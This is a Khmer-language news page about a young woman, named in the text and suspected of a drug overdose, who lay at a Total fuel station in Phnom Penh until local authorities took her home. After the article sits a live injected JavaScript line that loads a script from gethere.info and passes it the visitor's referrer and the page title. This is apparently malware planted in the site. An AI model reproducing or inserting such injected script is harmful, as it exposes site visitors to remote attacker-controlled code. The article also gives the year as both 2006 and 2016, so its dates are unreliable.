Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

នារីវ័យក្មេងម្នាក់សង្ស័យបែកថ្នាំ មកដេកក្នុងបរិវេនស្ថានីយ៍ប្រេងឥន្ធនៈTotal ដេញមិនចេញ

ភ្នំពេញ៖ នារីវ័យក្មេងម្នាក់ត្រូវបានគេសង្ស័យថាបែកថ្នាំអាចមកពីប្រើប្រាស់គ្រឿងញៀនលើសកំរិតហើយបានដើរមកដេកក្នុងបរិវេន ស្ថានីយ៍ប្រេងឥន្ធនៈTotal ដេញទៅណាក៍មិនទៅធ្វើអោយមានការភ្ញាក់ផ្អើលដល់ប្រជាលរដ្ឋប្តឹងមកអាជ្ញាធរមូលដ្ឋានជួយអត្តរាគមន៍។ហេតុការណ៍ខាងលើនេះបង្ករភ្ញាក់ផ្អើដល់អាជ្ញាធរមូលដ្ឋានកាលពីម៉ោង១១ព្រឹកថ្ងៃទី២៦ខែធ្នូ ឆ្នាំ២០០៦តាមបណ្តោយផ្លូវសហព័ន្ធរុស្សីក្នុងបរិវេនស្ថានីយ៍ប្រេងឥន្ធនៈTotal ស្ថិតក្នុងភូមិទឹកថ្លា សង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ។

នារីដែលគេសង្ស័យថាបែកថ្នាំនោះពេលដឹងខ្លួនម្តងៗបានប្រាប់ថានាងមានឈ្មោះ សឿន ស្រីស្រស់ អាយុ២០ឆ្នាំ ស្នាក់ភូមិឫស្សីក្នុង សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យនិង មានស្រុកកំណើតភូមិបឹងជ័រ ឃុំបឹងជ័រ ស្រុកព្រៃឈរខេត្តកំពង់ចាមនេះជាការឆ្លើយរបស់នាងទាំរវើរវាយ។

ប្រភពពីបុរសម្នាក់ដែលជាអ្នកមើលការខុសត្រូវនៅស្ថានីយ៍ប្រេងខាងលើបានឲ្យដឹងថា កាលពីល្ងាចថ្ងៃទី២៥ខែធ្នូ២០១៦
គាត់បានឃើញនារីខាងលើដើរនៅតាមដងផ្លូវមុខស្ថានីយ៍ប្រេងតែម្នាក់ឯងរហូតដល់យប់ស្រាប់តែដើរចូលមកក្នុងបរិវេន ការ៉ាស់សាំងហើយមើលទៅនារីនោះដូចជាមានសភាពមិនល្អពេលនោះគាត់បានអោយក្រុមការងារគាត់ដេញចេញដែតែនាងមិនព្រមចេញទេហើយក៍មកដេកនៅក្បែរម៉ាតទៅពេលនោះគាត់ក៍បានរាយការណ៍ប្រាប់ទៅអាជ្ញាធរសង្កាត់ទឹកថ្លាម្តងរួចហើយ។ ប្រភពពីដដែលបន្តទៀតថាលុះដល់ព្រឹកឡើងថ្ងៃទី២៦ខែធ្នូម៉ោងប្រហែល០៩និង៣០នាទីគាត់មកដល់កន្លែងធ្វើការ (ការ៉ាស់សាំង Total) ឃើញនារីនោះមិនទាន់ទៅណាក៍រាយការណ៍ទៅអាជ្ញាធរម្តងទៀតអោយចុះមកមើលបង្ករការភ្ញាក់ផ្អើលតែមម្តង។

ប្រភពពីលោកចៅសង្កាត់ទឹកថ្លា លោក តាន់ ណាវិន បានអោយដឹងថា បន្ទាប់ពីទទួលបាន ពីទទួលបានព័ត៌មាននេះលោកបានបញ្ជារអោយកំលាំងប្រជាការពារសង្កាត់និងភូមិចុះទៅពិនិត្យនិងសាកសួរក្រោយមកនាងមានស្មារតីចងចាំបន្តិចក៍ប្រាប់អោយអាជ្ញាធរជួយជូនទៅម្តុំភូមិឫស្សីក្នុងសង្កាត់ស្ទឹងមានជ័យជាកន្លែងដែលនាងស្នាក់នៅទើបអាជ្ញាធរជូនទៅតែម្តង៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More